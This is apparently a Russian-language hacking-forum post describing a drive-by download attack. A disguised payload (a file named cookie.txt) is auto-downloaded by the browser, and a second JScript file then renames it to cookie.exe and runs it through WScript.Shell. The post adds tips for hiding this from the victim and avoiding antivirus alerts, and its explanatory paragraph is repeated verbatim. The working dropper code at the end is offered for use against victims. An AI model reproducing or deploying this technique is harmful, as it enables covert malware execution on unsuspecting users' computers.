Всем привет тема мне показалось интересная так как у 70/90 процентов покемонов стоит автоматическая скачивание файла то есть так
Сама атака может быть опасной первый летит наша нагрузка в любом формате хоть картинка и.т.д у меня .TXT но не суть мало кто будет бегать по загрузкам и смотреть что там за файл куки на пример,можно все это допилить и открывать окно во весь браузер чтоб перекрыл видимость жертве вообще это видеть например и.т.д понятно что не каких алертов Вы не получите от первого файла и второй будет чист.
Видос:
Код js
Сама атака может быть опасной первый летит наша нагрузка в любом формате хоть картинка и.т.д у меня .TXT но не суть мало кто будет бегать по загрузкам и смотреть что там за файл куки на пример,можно все это допилить и открывать окно во весь браузер чтоб перекрыл видимость жертве вообще это видеть например и.т.д понятно что не каких алертов Вы не получите от первого файла и второй будет чист.
Видос:
Код:
WScript.Echo("Hello, World.");
var fso = new ActiveXObject("Scripting.FileSystemObject");
if(fso.FileExists("cookie.txt")){
fso.MoveFile('cookie.txt', 'cookie.exe');
} else {
}
var shell = new ActiveXObject('WScript.Shell');
shell.Run('cookie.exe');
